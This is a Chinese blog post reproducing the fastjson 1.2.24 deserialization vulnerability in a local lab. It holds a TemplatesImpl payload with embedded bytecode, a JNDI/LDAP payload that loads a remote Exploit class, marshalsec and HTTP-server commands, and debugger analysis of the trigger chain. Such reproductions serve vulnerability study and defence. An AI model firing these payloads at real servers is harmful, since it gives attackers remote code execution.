2. 程式人生 > 其它 >fastjosn反序列化漏洞歷史CVE學習整理

fastjosn反序列化漏洞歷史CVE學習整理

阿新 發佈:2021-06-16

fastjosn 反序列化漏洞學習

fastjson 1.2.24反序列化漏洞復現

先寫一個正常的使用 fastjson的web服務

我們使用 springboot建立

主要是pom.xml 裡面要新增fastjson
fastjson要求小於等於 1.2.24

    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.23</version>
    </dependency>

簡單寫個路由解析

controller.Login.java

@Controller
public class Login {
    @RequestMapping(value = "/fastjson", method = RequestMethod.POST)
    @ResponseBody
    public JSONObject test(@RequestBody String data) {
        JSONObject obj = JSON.parseObject(data);
        // JSONObject obj = JSON.parseObject(data, Feature.SupportNonPublicField); // 當使用 TemplatesImpl的時候用這個
        JSONObject result = new JSONObject();
        result.put("code", 200);
        result.put("message", "success");
        result.put("data", "Hello " + obj.get("name"));
        return result;
    }
}

model.User.java

public class User {
    public String name;
    public int age;
    public String id_card;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getId_card() {
        return id_card;
    }

    public void setId_card(String id_card) {
        this.id_card = id_card;
    }


}

controller.Login 是一個控制器是一個路由用於解析請求
model.User 是一個使用者類 包含一些屬性用於fastjson與資料對應解析

請求

這裡傳送的資料是這樣的

{
	"@type": "com.example.demo.model.User",
	"name": "Recar",
	"age": 22,
	"id_card": "12334567"
}

@type 是用於fastjson找到資料對應的類 下面的是User的屬性值

我們這裡可以看到成功解析了資料

復現及分析

基於TemplatesImpl的復現與分析

因為poc用到了 私有屬性 fastjson預設不會解析私有屬性 需要開啟這個 Feature.SupportNonPublicField

payload

{
	"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
	"_bytecodes": ["yv66vgAAADEALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQANTHBlcnNvbi9UZXN0OwEACkV4Y2VwdGlvbnMHACUBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHACYBAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAHAAgHACcMACgAKQEABGNhbGMMACoAKwEAC3BlcnNvbi9UZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAADwAEABAADQARAAsAAAAMAAEAAAAOAAwADQAAAA4AAAAEAAEADwABABAAEQABAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAFQALAAAAKgAEAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABQAFQACAAAAAQAWABcAAwABABAAGAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAAGgALAAAAIAADAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABkAGgACAA4AAAAEAAEAGwABABwAAAACAB0="],
	"_name": "a.b",
	"_tfactory": {},
	"_outputProperties": {}
}

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

type是想要序列化類的路徑
_bytecodes 最後呼叫getOutputProperties時會進行建立的Exploit類的class 二進位制base64編碼

發poc後斷點除錯

點選第一個下一步箭頭跟進 (F8) F7那個是跟入函式 我們跟入函式

可以直接快進到語法解析

語法解析的token

JavaBeanInfo build方法
getDeclaredFields 獲得某個類的所有宣告的欄位,即包括public、private和proteced,但是不包括父類的申明欄位

getDeclaredFields 獲取到的屬性值

程式會 建立了一個 陣列儲存後續將要處理的目標類的特定setter方法及特定條件的getter方法
呼叫getter條件就是如下圖

進入呼叫get的條件

 String methodName = method.getName();
if (
     methodName.length() >= 4 && // 方法名長度要大於等於4
     !Modifier.isStatic(method.getModifiers()) &&  // 不是靜態方法
     methodName.startsWith("get") &&  // 以get字串開頭
     Character.isUpperCase(methodName.charAt(3)) &&  // 第4個字元要是大寫字母
     method.getParameterTypes().length == 0 &&  // 方法不能有引數傳入

     (Collection.class.isAssignableFrom(method.getReturnType()) || 
     Map.class.isAssignableFrom(method.getReturnType()) || 
     AtomicBoolean.class == method.getReturnType() || 
     AtomicInteger.class == method.getReturnType() || 
     AtomicLong.class == method.getReturnType())) 
     // 繼承自Collection || Map || AtomicBoolean || AtomicInteger || AtomicLong

繼續走 走到 getOutputProperties 符合get的所有要求
並且將getOutputProperties 加入到 後面會進行呼叫的列表裡

可以看到列表裡有 這個方法

後面反射建立例項後呼叫方法設定 _bytecodes

然後呼叫 getOutputProperties 我們跟進

要求_name不能為空 空的話直接返回了

_bytecodes 不能為空

然後繼續
會呼叫 _tfacroty的getExternalExtensionsMap()方法 所以tfacroty要設定個{}

這裡可以看到 tfacroty 不是一個空的{}

tfactory 為啥不是空的 是fastjson在這裡對空的物件解析後會賦值應有的物件 在 TemplatesImpl裡可以看到 private transient TransformerFactoryImpl _tfactory = null;

並且跟進後可以看到有 getExternalExtensionsMap方法

_class[_transletIndex] 就是我們的要執行的類

newInstance 會呼叫建構函式 類似new newInstance只能呼叫無引數的建構函式

下劃線是怎麼回事去掉的
在 JavaBeanDeserializer中會把set get方法的下劃線去掉

poc中的 _outputProperties 去掉下劃線也可以用
其他屬性欄位是不行的

基於jndi ldap方法的攻擊鏈

因為我本機的jdk不滿足 rmi的條件 於是使用的ldap的方式來複現

ldap的方式是使用外部載入class的形式

payload

{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"ldap://localhost:1389/Exploit",
	"autoCommit":true
}

使用 marshalsec 構建 ldap服務

java環境:jdk1.8.0_161 < 1.8u191 (可以使用ldap注入)
git 先下載下來
git clone [email protected]:mbechler/marshalsec.git

mvn 編譯成jar包 (mvn最好配置好國內的比如阿里的maven源)

mvn clean package -DskipTests

最後target目錄下輸出 marshalsec-0.0.3-SNAPSHOT-all.jar

啟動 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8081/#Exploit

這裡是啟動了個ldap 然後我們需要構建個簡單的web服務返回exploit

編寫Exploit

執行命令執行計算器

public class Exploit {
    public Exploit (){
        try{
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    public static void  main(String[] argv){
        Exploit e = new Exploit();
    }
}

先直接執行 彈出計算器 在out目錄下看到 Exploit.class

啟動簡單web服務

簡單實用python建立
這個是python2的命令
python -m SimpleHTTPServer 8081

這個命令要在 Exploit.class 目錄下執行 埠與上面marshalsec執行命令的埠一致

postman傳送請求

{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"ldap://localhost:1389/Exploit",
	"autoCommit":true
}

斷點除錯

解析上傳的json

這次會被呼叫滿足條件的是 setAutoCommit setDataSourceName

呼叫set方法的條件是

方法名長度大於4且以set開頭,且第四個字母要是大寫

非靜態方法

返回型別為void或當前類

引數個數為1個

然後會設定dataSourceName值

反射呼叫setDataSourceNmae

反射呼叫setAutoCommit

觸發ldap裡的lookup方法 並且裡面的引數就是我們設定的遠端地址 就上面開源的那個工具裡很多可以利用的反序列化鏈

呼叫鏈

可以清晰的看到從 testVuln 介面進入 parse解析json物件後解析欄位 設定欄位值
使用invoke動態呼叫set方法
可以看到 setAutoCommit的方法呼叫 這裡觸發漏洞
然後是對expoit類的例項化
遠端呼叫這個expolit的類來實現執行
最後執行exec的方法

總結

  1. 基於TemplatesImpl的利用鏈
    使用_outputProperties方法可以滿足get的條件實現自動呼叫getOutputProperties 方法並且會使用到私有成員變數 _bytecodes 他又是可控的

  2. rmi 或者ldap方式
    是使用基於遠端載入類的方式 jndi有個setAutoCommit方式設定為True後會自動呼叫setValue方法
    使用特定的set方法來自動呼叫 和可控的引數傳入

  3. java會對@type的型別通過 javaBeanInfo 來獲取所有的屬性和方法
    通過特定條件過濾set和get方法 滿足的進行呼叫 再與可控引數 可控的 @type類 實現命令執行

相關推薦

fastjosn序列漏洞歷史CVE學習整理

fastjosn 序列漏洞學習 fastjson 1.2.24序列漏洞復現 先寫一個正常的使用 fastjson的web服務

Apache Shiro 1.2.4序列漏洞CVE-2016-4437)

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

jboss序列漏洞復現(CVE-2017-7504)

0x01 環境 使用vulhub搭建:/vulhub-master/jboss/CVE-2017-7504 漏洞點:http://192.168.255.130:8080/jbossmq-httpil/HTTPServerILServlet

Apache Dubbo序列漏洞CVE-2019-17564)復現分析

漏洞描述 Apache Dubbo是一款高效能Java RPC框架,核心功能是方便麵向介面的遠端過程呼叫,叢集容錯和負載均衡,以及服務自動註冊與發現。

漏洞復現系列】WebLogic XMLDecoder序列漏洞CVE-2017-10271)

使用vulhub環境: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 啟動測試環境:

Apache Shiro 1.2.4序列漏洞CVE-2016-4437)復現

Apache Shiro 1.2.4序列漏洞CVE-2016-4437)復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

ActiveMQ序列漏洞CVE-2015-5254)復現

ActiveMQ序列漏洞CVE-2015-5254)復現 導語 Apache ActiveMQ是美國阿帕奇(Apache)軟體基金會所研發的一套開源的訊息中介軟體,它支援Java訊息服務、叢集、Spring Framework等。

Joomla 3.4.5 序列漏洞CVE-2015-8562)

Joomla 3.4.5 反序列化漏洞CVE-2015-8562) 2021年8月22日 21:22 漏洞介紹: 本漏洞根源是PHP5.6.13前的版本在讀取儲存好的session時,如果反序列化出錯則會跳過當前一段資料而去反序列化下一段資料。而Jooml

漏洞復現 - Apache Shiro 1.2.4序列漏洞CVE-2016-4437)

漏洞原理 Apache Shiro 是 Java 的一個安全框架,可以幫助我們完成:認證、授權、加密、會話管理、與 Web 整合、快取等功能,應用十分廣泛。

ActiveMQ序列漏洞CVE-2015-5254)

0x01漏洞概述 ActiveMQ Web控制檯分為三個應用程式,admin,api和fileserver,其中admin是管理員頁面,api是介面,fileserver是儲存檔案的介面;管理員和 API 需要先登入才能使用,檔案伺服器不需要登入。

Weblogic &lt; 10.3.6 'wls-wsat' XMLDecoder 序列漏洞CVE-2017-10271)

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現序列漏洞,導致可執行任意命令。

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

PHP 序列漏洞入門學習筆記

參考文章: PHP序列漏洞入門 easy_serialize_php wp 實戰經驗丨PHP序列漏洞總結

CVE-2020-14644 weblogic iiop序列漏洞

0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 0x01 環境準備

CVE-2020-9496 apache ofbiz xml-rpc序列漏洞分析

0x00 apache ofbiz介紹 OFBiz是一個非常著名的電子商務平臺,是一個非常著名的開源專案,提供了建立基於最新J2EE/XML規範和技術標準,構建大中型企業級、跨平臺、跨資料庫、跨應用伺服器的多層、分散式電子商務類WEB

Apache Shiro序列漏洞復現(CVE-2016-4437)

0x00 Apache Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

weblogic CVE-2020-2963、CNVD-2020-23019 序列漏洞分析與復現

簡介 這兩個洞應該都是5月更新的補丁,分析時候無意中發現的。看了一下漏洞挺簡單,就是利用有點苛刻

CVE-2020-14825:Weblogic序列漏洞復現

全程無圖,全靠編 參考:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247486336&idx=1&sn=2a054ededbc855622fe2ac6c8906aae0&chksm=90392d70a74ea46635bef3cd4fc414cef87d16a1875ccb690f

Python 序列漏洞學習筆記

參考文章 一篇文章帶你理解漏洞之 Python 序列漏洞 Python Pickle/CPickle 序列漏洞

Xstream序列漏洞學習筆記

繼續用去年寫的筆記混點部落格kpi... 目錄 CVE-2013-7285 CVE-2020-26217 CVE-2021-21344 CVE-2021-21344<Xstream<CVE-2021-29505